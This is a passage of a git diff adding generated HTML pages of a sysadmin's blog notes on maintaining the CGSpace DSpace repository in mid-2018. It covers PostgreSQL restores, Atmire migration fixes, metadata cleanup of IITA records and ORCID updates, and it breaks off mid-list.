+</ul>
+<pre tabindex="0"><code>$ docker pull postgres:9.5-alpine
+$ docker run --name dspacedb -e POSTGRES_PASSWORD=postgres -p 5432:5432 -d postgres:9.5-alpine
+$ createuser -h localhost -U postgres --pwprompt dspacetest
+$ createdb -h localhost -U postgres -O dspacetest --encoding=UNICODE dspacetest
+$ psql -h localhost -U postgres dspacetest -c &#39;alter user dspacetest superuser;&#39;
+$ pg_restore -h localhost -O -U dspacetest -d dspacetest -W -h localhost ~/Downloads/cgspace_2018-05-30.backup
+$ psql -h localhost -U postgres dspacetest -c &#39;alter user dspacetest nosuperuser;&#39;
+$ psql -h localhost -U dspacetest -f ~/src/git/DSpace/dspace/etc/postgres/update-sequences.sql dspacetest
+$ psql -h localhost -U postgres dspacetest
+</code></pre>
+
+  
+
+  
+
+</article> 
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/2018-06/index.html b/docs/2018-06/index.html
new file mode 100644
index 000000000..0c12c836b
--- /dev/null
+++ b/docs/2018-06/index.html
@@ -0,0 +1,571 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="June, 2018" />
+<meta property="og:description" content="2018-06-04
+
+Test the DSpace 5.8 module upgrades from Atmire (#378)
+
+There seems to be a problem with the CUA and L&amp;R versions in pom.xml because they are using SNAPSHOT and it doesn&rsquo;t build
+
+
+I added the new CCAFS Phase II Project Tag PII-FP1_PACCA2 and merged it into the 5_x-prod branch (#379)
+I proofed and tested the ILRI author corrections that Peter sent back to me this week:
+
+$ ./fix-metadata-values.py -i /tmp/2018-05-30-Correct-660-authors.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.contributor.author -t correct -m 3 -n
+
+I think a sane proofing workflow in OpenRefine is to apply the custom text facets for check/delete/remove and illegal characters that I developed in March, 2018
+Time to index ~70,000 items on CGSpace:
+
+$ time schedtool -D -e ionice -c2 -n7 nice -n19 [dspace]/bin/dspace index-discovery -b                                  
+
+real    74m42.646s
+user    8m5.056s
+sys     2m7.289s
+" />
+<meta property="og:type" content="article" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/2018-06/" />
+<meta property="article:published_time" content="2018-06-04T19:49:54-07:00" />
+<meta property="article:modified_time" content="2020-02-17T11:38:34+02:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="June, 2018"/>
+<meta name="twitter:description" content="2018-06-04
+
+Test the DSpace 5.8 module upgrades from Atmire (#378)
+
+There seems to be a problem with the CUA and L&amp;R versions in pom.xml because they are using SNAPSHOT and it doesn&rsquo;t build
+
+
+I added the new CCAFS Phase II Project Tag PII-FP1_PACCA2 and merged it into the 5_x-prod branch (#379)
+I proofed and tested the ILRI author corrections that Peter sent back to me this week:
+
+$ ./fix-metadata-values.py -i /tmp/2018-05-30-Correct-660-authors.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.contributor.author -t correct -m 3 -n
+
+I think a sane proofing workflow in OpenRefine is to apply the custom text facets for check/delete/remove and illegal characters that I developed in March, 2018
+Time to index ~70,000 items on CGSpace:
+
+$ time schedtool -D -e ionice -c2 -n7 nice -n19 [dspace]/bin/dspace index-discovery -b                                  
+
+real    74m42.646s
+user    8m5.056s
+sys     2m7.289s
+"/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+<script type="application/ld+json">
+{
+  "@context": "http://schema.org",
+  "@type": "BlogPosting",
+  "headline": "June, 2018",
+  "url": "https://alanorth.github.io/cgspace-notes/2018-06/",
+  "wordCount": "2894",
+  "datePublished": "2018-06-04T19:49:54-07:00",
+  "dateModified": "2020-02-17T11:38:34+02:00",
+  "author": {
+    "@type": "Person",
+    "name": "Alan Orth"
+  },
+  "keywords": "Notes"
+}
+</script>
+
+
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/2018-06/">
+
+    <title>June, 2018 | CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link " href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2018-06/">June, 2018</a></h2>
+    <p class="blog-post-meta">
+<time datetime="2018-06-04T19:49:54-07:00">Mon Jun 04, 2018</time>
+ in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2018-06-04">2018-06-04</h2>
+<ul>
+<li>Test the <a href="https://tracker.atmire.com/tickets-cgiar-ilri/view-ticket?id=560">DSpace 5.8 module upgrades from Atmire</a> (<a href="https://github.com/ilri/DSpace/pull/378">#378</a>)
+<ul>
+<li>There seems to be a problem with the CUA and L&amp;R versions in <code>pom.xml</code> because they are using SNAPSHOT and it doesn&rsquo;t build</li>
+</ul>
+</li>
+<li>I added the new CCAFS Phase II Project Tag <code>PII-FP1_PACCA2</code> and merged it into the <code>5_x-prod</code> branch (<a href="https://github.com/ilri/DSpace/pull/379">#379</a>)</li>
+<li>I proofed and tested the ILRI author corrections that Peter sent back to me this week:</li>
+</ul>
+<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2018-05-30-Correct-660-authors.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.contributor.author -t correct -m 3 -n
+</code></pre><ul>
+<li>I think a sane proofing workflow in OpenRefine is to apply the custom text facets for check/delete/remove and illegal characters that I developed in <a href="/cgspace-notes/2018-03/">March, 2018</a></li>
+<li>Time to index ~70,000 items on CGSpace:</li>
+</ul>
+<pre tabindex="0"><code>$ time schedtool -D -e ionice -c2 -n7 nice -n19 [dspace]/bin/dspace index-discovery -b                                  
+
+real    74m42.646s
+user    8m5.056s
+sys     2m7.289s
+</code></pre><h2 id="2018-06-06">2018-06-06</h2>
+<ul>
+<li>It turns out that I needed to add a server block for <code>atmire.com-snapshots</code> to my Maven settings, so now the Atmire code builds</li>
+<li>Now Maven and Ant run properly, but I&rsquo;m getting SQL migration errors in <code>dspace.log</code> after starting Tomcat</li>
+<li>I&rsquo;ve updated my ticket on Atmire&rsquo;s bug tracker: <a href="https://tracker.atmire.com/tickets-cgiar-ilri/view-ticket?id=560">https://tracker.atmire.com/tickets-cgiar-ilri/view-ticket?id=560</a></li>
+</ul>
+<h2 id="2018-06-07">2018-06-07</h2>
+<ul>
+<li>Proofing 200 IITA records on DSpace Test for Sisay: <a href="https://dspacetest.cgiar.org/handle/10568/95391">IITA_Junel_06 (10568/95391)</a>
+<ul>
+<li>Mispelled authorship type: CGAIR single center should be: CGIAR single centre</li>
+<li>I see some encoding errors in author affiliations, for example:
+<ul>
+<li>Universidade de SÆo Paulo</li>
+<li>Institut National des Recherches Agricoles du B nin</li>
+<li>Centre de Coop ration Internationale en Recherche Agronomique pour le D veloppement</li>
+<li>Institut des Recherches Agricoles du B nin</li>
+<li>Institut des Savannes, C te d&rsquo; Ivoire</li>
+<li>Institut f r Pflanzenpathologie und Pflanzenschutz der Universit t, Germany</li>
+<li>Projet de Gestion des Ressources Naturelles, B nin</li>
+<li>Universit t Hannover</li>
+<li>Universit F lix Houphouet-Boigny</li>
+</ul>
+</li>
+</ul>
+</li>
+<li>I uploaded fixes for all those now, but I will continue with the rest of the data later</li>
+<li>Regarding the SQL migration errors, Atmire told me I need to run some migrations manually in PostgreSQL:</li>
+</ul>
+<pre tabindex="0"><code>delete from schema_version where version = &#39;5.6.2015.12.03.2&#39;;
+update schema_version set version = &#39;5.6.2015.12.03.2&#39; where version = &#39;5.5.2015.12.03.2&#39;;
+update schema_version set version = &#39;5.8.2015.12.03.3&#39; where version = &#39;5.5.2015.12.03.3&#39;;
+</code></pre><ul>
+<li>And then I need to ignore the ignored ones:</li>
+</ul>
+<pre tabindex="0"><code>$ ~/dspace/bin/dspace database migrate ignored
+</code></pre><ul>
+<li>Now DSpace starts up properly!</li>
+<li>Gabriela from CIP got back to me about the author names we were correcting on CGSpace</li>
+<li>I did a quick sanity check on them and then did a test import with my <a href="https://gist.github.com/alanorth/df92cbfb54d762ba21b28f7cd83b6897"><code>fix-metadata-value.py</code></a> script:</li>
+</ul>
+<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2018-06-08-CIP-Authors.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.contributor.author -t correct -m 3
+</code></pre><ul>
+<li>I will apply them on CGSpace tomorrow I think&hellip;</li>
+</ul>
+<h2 id="2018-06-09">2018-06-09</h2>
+<ul>
+<li>It&rsquo;s pretty annoying, but the JVM monitoring for Munin was never set up when I migrated DSpace Test to its new server a few months ago</li>
+<li>I ran the tomcat and munin-node tags in Ansible again and now the stuff is all wired up and recording stats properly</li>
+<li>I applied the CIP author corrections on CGSpace and DSpace Test and re-ran the Discovery indexing</li>
+</ul>
+<h2 id="2018-06-10">2018-06-10</h2>
+<ul>
+<li>I spent some time removing the Atmire Metadata Quality Module (MQM) from the proposed DSpace 5.8 changes</li>
+<li>After removing all code mentioning MQM, mqm, metadata-quality, batchedit, duplicatechecker, etc, I think I got most of it removed, but there is a Spring error during Tomcat startup:</li>
+</ul>
+<pre tabindex="0"><code> INFO [org.dspace.servicemanager.DSpaceServiceManager] Shutdown DSpace core service manager
+Failed to startup the DSpace Service Manager: failure starting up spring service manager: Error creating bean with name &#39;org.dspace.servicemanager.spring.DSpaceBeanPostProcessor#0&#39; defined in class path resource [spring/spring-dspace-applicationContext.xml]: Unsatisfied dependency expressed through constructor argument with index 0 of type [org.dspace.servicemanager.config.DSpaceConfigurationService]: : Cannot find class [com.atmire.dspace.discovery.ItemCollectionPlugin] for bean with name &#39;itemCollectionPlugin&#39; defined in file [/home/aorth/dspace/config/spring/api/discovery.xml];
+</code></pre><ul>
+<li>I can fix this by commenting out the <code>ItemCollectionPlugin</code> line of <code>discovery.xml</code>, but from looking at the git log I&rsquo;m not actually sure if that is related to MQM or not</li>
+<li>I will have to ask Atmire</li>
+<li>I continued to look at Sisay&rsquo;s IITA records from last week
+<ul>
+<li>I normalized all DOIs to use HTTPS and &ldquo;doi.org&rdquo; instead of &ldquo;dx.doi.org&rdquo;</li>
+<li>I cleaned up white space in <code>cg.subject.iita</code> and <code>dc.subject</code></li>
+<li>Even a bunch of IITA and AGROVOC subjects are missing accents, ie &ldquo;FERTILIT DU SOL&rdquo;</li>
+<li>More organization names in <code>dc.description.sponsorship</code> are incorrect (ie, missing accents) or inconsistent (ie, CGIAR centers should be spelled in English or multiple spellings of the same one, like &ldquo;Rockefeller Foundation&rdquo; and &ldquo;Rockefeller foundation&rdquo;)</li>
+<li>A few dozen items have abstracts with character encoding errors, ie:
+<ul>
+<li>33.7øC</li>
+<li>MgSO4ú7H2O</li>
+<li>ha??1&amp;/sup;</li>
+<li>En gen6ral</li>
+<li>dÕpassÕ</li>
+</ul>
+</li>
+<li>Also the abstracts have missing accents, ie &ldquo;recherche sur le d veloppement&rdquo;</li>
+</ul>
+</li>
+<li>I will have to tell IITA people to redo these entirely I think&hellip;</li>
+</ul>
+<h2 id="2018-06-11">2018-06-11</h2>
+<ul>
+<li>Sisay sent a new version of the last IITA records that he created from the original CSV from IITA</li>
+<li>The 200 records are in the <a href="https://dspacetest.cgiar.org/handle/10568/95870">IITA_Junel_11 (10568/95870)</a> collection</li>
+<li>Many errors:
+<ul>
+<li>Authorship types: &ldquo;CGIAR ans advanced research institute&rdquo;, &ldquo;CGAIR and advanced research institute&rdquo;, &ldquo;CGIAR and advanced research institutes&rdquo;, &ldquo;CGAIR single center&rdquo;</li>
+<li>Lots of inconsistencies and mispellings in author affiliations:
+<ul>
+<li>&ldquo;Institut des Recherches Agricoles du Bénin&rdquo; and &ldquo;Institut National des Recherche Agricoles du Benin&rdquo; and &ldquo;National Agricultural Research Institute, Benin&rdquo;</li>
+<li>International Insitute of Tropical Agriculture</li>
+<li>Centro Internacional de Agricultura Tropical</li>
+<li>&ldquo;Rivers State University of Science and Technology&rdquo; and &ldquo;Rivers State University&rdquo;</li>
+<li>&ldquo;Institut de la Recherche Agronomique, Cameroon&rdquo; and &ldquo;Institut de Recherche Agronomique, Cameroon&rdquo;</li>
+</ul>
+</li>
+<li>Inconsistency in countries: &ldquo;COTE D’IVOIRE&rdquo; and &ldquo;COTE D&rsquo;IVOIRE&rdquo;</li>
+<li>A few DOIs with spaces or invalid characters</li>
+<li>Inconsistency in IITA subjects, for example &ldquo;PRODUCTION VEGETALE&rdquo; and &ldquo;PRODUCTION VÉGÉTALE&rdquo; and several others</li>
+<li>I ran <code>value.unescape('javascript')</code> on the abstract and citation fields because it looks like this data came from a SQL database and some stuff was escaped</li>
+</ul>
+</li>
+<li>It turns out that Abenet actually did a lot of small corrections on this data so when Sisay uses Bosede&rsquo;s original file it doesn&rsquo;t have all those corrections</li>
+<li>So I told Sisay to re-create the collection using Abenet&rsquo;s XLS from last week (<code>Mercy1805_AY.xls</code>)</li>
+<li>I was curious to see if I could create a GREL for use with a custom text facet in Open Refine to find cells with two or more consecutive spaces</li>
+<li>I always use the built-in trim and collapse transformations anyways, but this seems to work to find the offending cells: <code>isNotNull(value.match(/.*?\s{2,}.*?/))</code></li>
+<li>I wonder if I should start checking for &ldquo;smart&rdquo; quotes like ’ (hex 2019)</li>
+</ul>
+<h2 id="2018-06-12">2018-06-12</h2>
+<ul>
+<li>Udana from IWMI asked about the OAI base URL for their community on CGSpace
+<ul>
+<li>I think it should be this: <a href="https://cgspace.cgiar.org/oai/request?verb=ListRecords&amp;metadataPrefix=oai_dc&amp;set=com_10568_16814">https://cgspace.cgiar.org/oai/request?verb=ListRecords&amp;metadataPrefix=oai_dc&amp;set=com_10568_16814</a></li>
+<li>The style sheet obfuscates the data, but if you look at the source it is all there, including information about pagination of results</li>
+</ul>
+</li>
+<li>Regarding Udana&rsquo;s Book Chapters and Reports on DSpace Test last week, Abenet told him to fix some character encoding and CRP issues, then I told him I&rsquo;d check them after that</li>
+<li>The latest batch of IITA&rsquo;s 200 records (based on Abenet&rsquo;s version <code>Mercy1805_AY.xls</code>) are now in the <a href="https://dspacetest.cgiar.org/handle/10568/96071">IITA_Jan_9_II_Ab</a> collection</li>
+<li>So here are some corrections:
+<ul>
+<li>use of Unicode smart quote (hex 2019) in countries and affiliations, for example &ldquo;COTE D’IVOIRE&rdquo; and &ldquo;Institut d’Economic Rurale, Mali&rdquo;</li>
+<li>inconsistencies in <code>cg.contributor.affiliation</code>:
+<ul>
+<li>&ldquo;Centro Internacional de Agricultura Tropical&rdquo; and &ldquo;Centro International de Agricultura Tropical&rdquo; should use the English name of CIAT (International Center for Tropical Agriculture)</li>
+<li>&ldquo;Institut International d&rsquo;Agriculture Tropicale&rdquo; should use the English name of IITA (International Institute of Tropical Agriculture)</li>
+<li>&ldquo;East and Southern Africa Regional Center&rdquo; and &ldquo;Eastern and Southern Africa Regional Centre&rdquo;</li>
+<li>&ldquo;Institut de la Recherche Agronomique, Cameroon&rdquo; and &ldquo;Institut de Recherche Agronomique, Cameroon&rdquo;</li>
+<li>&ldquo;Institut des Recherches Agricoles du Bénin&rdquo; and &ldquo;Institut National des Recherche Agricoles du Benin&rdquo; and &ldquo;National Agricultural Research Institute, Benin&rdquo;</li>
+<li>&ldquo;Institute of Agronomic Research, Cameroon&rdquo; and &ldquo;Institute of Agronomy Research, Cameroon&rdquo;</li>
+<li>&ldquo;Rivers State University&rdquo; and &ldquo;Rivers State University of Science and Technology&rdquo;</li>
+<li>&ldquo;Universität Hannover&rdquo; and &ldquo;University of Hannover&rdquo;</li>
+</ul>
+</li>
+<li>inconsistencies in <code>cg.subject.iita</code>:
+<ul>
+<li>&ldquo;AMELIORATION DES PLANTES&rdquo; and &ldquo;AMÉLIORATION DES PLANTES&rdquo;</li>
+<li>&ldquo;PRODUCTION VEGETALE&rdquo; and &ldquo;PRODUCTION VÉGÉTALE&rdquo;</li>
+<li>&ldquo;CONTRÔLE DE MALADIES&rdquo; and &ldquo;CONTROLE DES MALADIES&rdquo;</li>
+<li>&ldquo;HANDLING, TRANSPORT, STORAGE AND PROTECTION OF AGRICULTURAL PRODUCT&rdquo; and &ldquo;HANDLING, TRANSPORT, STORAGE AND PROTECTION OF AGRICULTURAL PRODUCTS&rdquo;</li>
+<li>&ldquo;RAVAGEURS DE PLANTES&rdquo; and &ldquo;RAVAGEURS DES PLANTES&rdquo;</li>
+<li>&ldquo;SANTE DES PLANTES&rdquo; and &ldquo;SANTÉ DES PLANTES&rdquo;</li>
+<li>&ldquo;SOCIOECONOMIE&rdquo; and &ldquo;SOCIOECONOMY&rdquo;</li>
+</ul>
+</li>
+<li>inconsistencies in <code>dc.description.sponsorship</code>:
+<ul>
+<li>&ldquo;Belgian Corporation&rdquo; and &ldquo;Belgium Corporation&rdquo;</li>
+</ul>
+</li>
+<li>inconsistencies in <code>dc.subject</code>:
+<ul>
+<li>&ldquo;AFRICAN CASSAVA MOSAIC&rdquo; and &ldquo;AFRICAN CASSAVA MOSAIC DISEASE&rdquo;</li>
+<li>&ldquo;ASPERGILLU FLAVUS&rdquo; and &ldquo;ASPERGILLUS FLAVUS&rdquo;</li>
+<li>&ldquo;BIOTECHNOLOGIES&rdquo; and &ldquo;BIOTECHNOLOGY&rdquo;</li>
+<li>&ldquo;CASSAVA MOSAIC DISEASE&rdquo; and &ldquo;CASSAVA MOSAIC DISEASES&rdquo; and &ldquo;CASSAVA MOSAIC VIRUS&rdquo;</li>
+<li>&ldquo;CASSAVA PROCESSING&rdquo; and &ldquo;CASSAVA PROCESSING TECHNOLOGY&rdquo;</li>
+<li>&ldquo;CROPPING SYSTEM&rdquo; and &ldquo;CROPPING SYSTEMS&rdquo;</li>
+<li>&ldquo;DRY SEASON&rdquo; and &ldquo;DRY-SEASON&rdquo;</li>
+<li>&ldquo;FERTILIZER&rdquo; and &ldquo;FERTILIZERS&rdquo;</li>
+<li>&ldquo;LEGUME&rdquo; and &ldquo;LEGUMES&rdquo;</li>
+<li>&ldquo;LEGUMINOSAE&rdquo; and &ldquo;LEGUMINOUS&rdquo;</li>
+<li>&ldquo;LEGUMINOUS COVER CROP&rdquo; and &ldquo;LEGUMINOUS COVER CROPS&rdquo;</li>
+<li>&ldquo;MATÉRIEL DE PLANTATION&rdquo; and &ldquo;MATÉRIELS DE PLANTATION&rdquo;</li>
+</ul>
+</li>
+<li>I noticed that some records do have encoding errors in the <code>dc.description.abstract</code> field, but only four of them so probably not from Abenet&rsquo;s handling of the XLS file</li>
+<li>Based on manually eyeballing the text I used a custom text facet with this GREL to identify the records:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>or(
+  value.contains(&#39;€&#39;),
+  value.contains(&#39;6g&#39;),
+  value.contains(&#39;6m&#39;),
+  value.contains(&#39;6d&#39;),
+  value.contains(&#39;6e&#39;)
+)
+</code></pre><ul>
+<li>So IITA should double check the abstracts for these:
+<ul>
+<li><a href="https://dspacetest.cgiar.org/10568/96184">https://dspacetest.cgiar.org/10568/96184</a></li>
+<li><a href="https://dspacetest.cgiar.org/10568/96141">https://dspacetest.cgiar.org/10568/96141</a></li>
+<li><a href="https://dspacetest.cgiar.org/10568/96118">https://dspacetest.cgiar.org/10568/96118</a></li>
+<li><a href="https://dspacetest.cgiar.org/10568/96113">https://dspacetest.cgiar.org/10568/96113</a></li>
+</ul>
+</li>
+</ul>
+<h2 id="2018-06-13">2018-06-13</h2>
+<ul>
+<li>Elizabeth from CIAT contacted me to ask if I could add ORCID identifiers to all of Robin Buruchara&rsquo;s items</li>
+<li>I used my <a href="https://gist.githubusercontent.com/alanorth/a49d85cd9c5dea89cddbe809813a7050/raw/f67b6e45a9a940732882ae4bb26897a9b245ef31/add-orcid-identifiers-csv.py">add-orcid-identifiers-csv.py</a> script:</li>
+</ul>
+<pre tabindex="0"><code>$ ./add-orcid-identifiers-csv.py -i 2018-06-13-Robin-Buruchara.csv -db dspace -u dspace -p &#39;fuuu&#39;
+</code></pre><ul>
+<li>The contents of <code>2018-06-13-Robin-Buruchara.csv</code> were:</li>
+</ul>
+<pre tabindex="0"><code>dc.contributor.author,cg.creator.id
+&#34;Buruchara, Robin&#34;,Robin Buruchara: 0000-0003-0934-1218
+&#34;Buruchara, Robin A.&#34;,Robin Buruchara: 0000-0003-0934-1218
+</code></pre><ul>
+<li>On a hunch I checked to see if CGSpace&rsquo;s bitstream cleanup was working properly and of course it&rsquo;s broken:</li>
+</ul>
+<pre tabindex="0"><code>$ dspace cleanup -v
+...
+Error: ERROR: update or delete on table &#34;bitstream&#34; violates foreign key constraint &#34;bundle_primary_bitstream_id_fkey&#34; on table &#34;bundle&#34;
+  Detail: Key (bitstream_id)=(152402) is still referenced from table &#34;bundle&#34;.
+</code></pre><ul>
+<li>As always, the solution is to delete that ID manually in PostgreSQL:</li>
+</ul>
+<pre tabindex="0"><code>$ psql dspace -c &#39;update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (152402);&#39;
+UPDATE 1
+</code></pre><h2 id="2018-06-14">2018-06-14</h2>
+<ul>
+<li>Check through Udana&rsquo;s IWMI records from last week on DSpace Test</li>
+<li>There were only some minor whitespace and one or two syntax errors, but they look very good otherwise</li>
+<li>I uploaded the twenty-four reports to the IWMI Reports collection: <a href="https://cgspace.cgiar.org/handle/10568/36188">https://cgspace.cgiar.org/handle/10568/36188</a></li>
+<li>I uploaded the seventy-six book chapters to the IWMI Book Chapters collection: <a href="https://cgspace.cgiar.org/handle/10568/36178">https://cgspace.cgiar.org/handle/10568/36178</a></li>
+</ul>
+<h2 id="2018-06-24">2018-06-24</h2>
+<ul>
+<li>I was restoring a PostgreSQL dump on my test machine and found a way to restore the CGSpace dump as the <code>postgres</code> user, but have the owner of the schema be the <code>dspacetest</code> user:</li>
+</ul>
+<pre tabindex="0"><code>$ dropdb -h localhost -U postgres dspacetest
+$ createdb -h localhost -U postgres -O dspacetest --encoding=UNICODE dspacetest
+$ psql -h localhost -U postgres dspacetest -c &#39;alter user dspacetest superuser;&#39;
+$ pg_restore -h localhost -U postgres -d dspacetest -O --role=dspacetest -h localhost /tmp/cgspace_2018-06-24.backup
+$ psql -h localhost -U postgres dspacetest -c &#39;alter user dspacetest nosuperuser;&#39;
+</code></pre><ul>
+<li>The <code>-O</code> option to <code>pg_restore</code> makes the import process ignore ownership specified in the dump itself, and instead makes the schema owned by the user doing the restore</li>
+<li>I always prefer to use the <code>postgres</code> user locally because it&rsquo;s just easier than remembering the <code>dspacetest</code> user&rsquo;s password, but then I couldn&rsquo;t figure out why the resulting schema was owned by <code>postgres</code></li>
+<li>So with this you connect as the <code>postgres</code> superuser and then switch roles to <code>dspacetest</code> (also, make sure this user has <code>superuser</code> privileges before the restore)</li>
+<li>Last week Linode emailed me to say that our Linode 8192 instance used for DSpace Test qualified for an upgrade</li>
+<li>Apparently they announced some <a href="https://blog.linode.com/2018/05/17/updated-linode-plans-new-larger-linodes/">upgrades to most of their plans in 2018-05</a></li>
+<li>After the upgrade I see we have more disk space available in the instance&rsquo;s dashboard, so I shut the instance down and resized it from 98GB to 160GB</li>
+<li>The resize was very quick (less than one minute) and after booting the instance back up I now have 160GB for the root filesystem!</li>
+<li>I will move the DSpace installation directory back to the root file system and delete the extra 300GB block storage, as it was actually kinda slow when we put Solr there and now we don&rsquo;t actually need it anymore because running the production Solr on this instance didn&rsquo;t work well with 8GB of RAM</li>
+<li>Also, the larger instance we&rsquo;re using for CGSpace will go from 24GB of RAM to 32, and will also get a storage increase from 320GB to 640GB&hellip; that means we don&rsquo;t need to consider using block storage right now!</li>
+<li>The smaller instances get increased storage and network speed but I doubt many are actually using much of their current allocations so we probably don&rsquo;t need to bother with upgrading them</li>
+<li>Last week Abenet asked if we could add <code>dc.language.iso</code> to the advanced search filters</li>
+<li>There is already a search filter for this field defined in <code>discovery.xml</code> but we aren&rsquo;t using it, so I quickly enabled and tested it, then merged it to the <code>5_x-prod</code> branch (<a href="https://github.com/ilri/DSpace/pull/380">#380</a>)</li>
+<li>Back to testing the DSpace 5.8 changes from Atmire, I had another issue with SQL migrations:</li>
+</ul>
+<pre tabindex="0"><code>Caused by: org.flywaydb.core.api.FlywayException: Validate failed. Found differences between applied migrations and available migrations: Detected applied migration missing on the classpath: 5.8.2015.12.03.3
+</code></pre><ul>
+<li>It took me a while to figure out that this migration is for MQM, which I removed after Atmire&rsquo;s original advice about the migrations so we actually need to delete this migration instead up updating it</li>
+<li>So I need to make sure to run the following during the DSpace 5.8 upgrade:</li>
+</ul>
+<pre tabindex="0"><code>-- Delete existing CUA 4 migration if it exists
+delete from schema_version where version = &#39;5.6.2015.12.03.2&#39;;
+
+-- Update version of CUA 4 migration
+update schema_version set version = &#39;5.6.2015.12.03.2&#39; where version = &#39;5.5.2015.12.03.2&#39;;
+
+-- Delete MQM migration since we&#39;re no longer using it
+delete from schema_version where version = &#39;5.5.2015.12.03.3&#39;;
+</code></pre><ul>
+<li>After that you can run the migrations manually and then DSpace should work fine:</li>
+</ul>
+<pre tabindex="0"><code>$ ~/dspace/bin/dspace database migrate ignored
+...
+Done.
+</code></pre><ul>
+<li>Elizabeth from CIAT contacted me to ask if I could add ORCID identifiers to all of Andy Jarvis&rsquo; items on CGSpace</li>
+<li>I used my <a href="https://gist.githubusercontent.com/alanorth/a49d85cd9c5dea89cddbe809813a7050/raw/f67b6e45a9a940732882ae4bb26897a9b245ef31/add-orcid-identifiers-csv.py">add-orcid-identifiers-csv.py</a> script:</li>
+</ul>
+<pre tabindex="0"><code>$ ./add-orcid-identifiers-csv.py -i 2018-06-24-andy-jarvis-orcid.csv -db dspacetest -u dspacetest -p &#39;fuuu&#39;
+</code></pre><ul>
+<li>The contents of <code>2018-06-24-andy-jarvis-orcid.csv</code> were:</li>
+</ul>
+<pre tabindex="0"><code>dc.contributor.author,cg.creator.id
+&#34;Jarvis, A.&#34;,Andy Jarvis: 0000-0001-6543-0798
+&#34;Jarvis, Andy&#34;,Andy Jarvis: 0000-0001-6543-0798
+&#34;Jarvis, Andrew&#34;,Andy Jarvis: 0000-0001-6543-0798
+</code></pre><h2 id="2018-06-26">2018-06-26</h2>
+<ul>
+<li>Atmire got back to me to say that we can remove the <code>itemCollectionPlugin</code> and <code>HasBitstreamsSSIPlugin</code> beans from DSpace&rsquo;s <code>discovery.xml</code> file, as they are used by the Metadata Quality Module (MQM) that we are not using anymore</li>
+<li>I removed both those beans and did some simple tests to check item submission, media-filter of PDFs, REST API, but got an error &ldquo;No matches for the query&rdquo; when listing records in OAI</li>
+<li>This warning appears in the DSpace log:</li>
+</ul>
+<pre tabindex="0"><code>2018-06-26 16:58:12,052 WARN  org.dspace.xoai.services.impl.xoai.DSpaceRepositoryConfiguration @ { OAI 2.0 :: DSpace } Not able to retrieve the dspace.oai.url property from oai.cfg. Falling back to request address
+</code></pre><ul>
+<li>It&rsquo;s actually only a warning and it also appears in the logs on DSpace Test (which is currently running DSpace 5.5), so I need to keep troubleshooting</li>
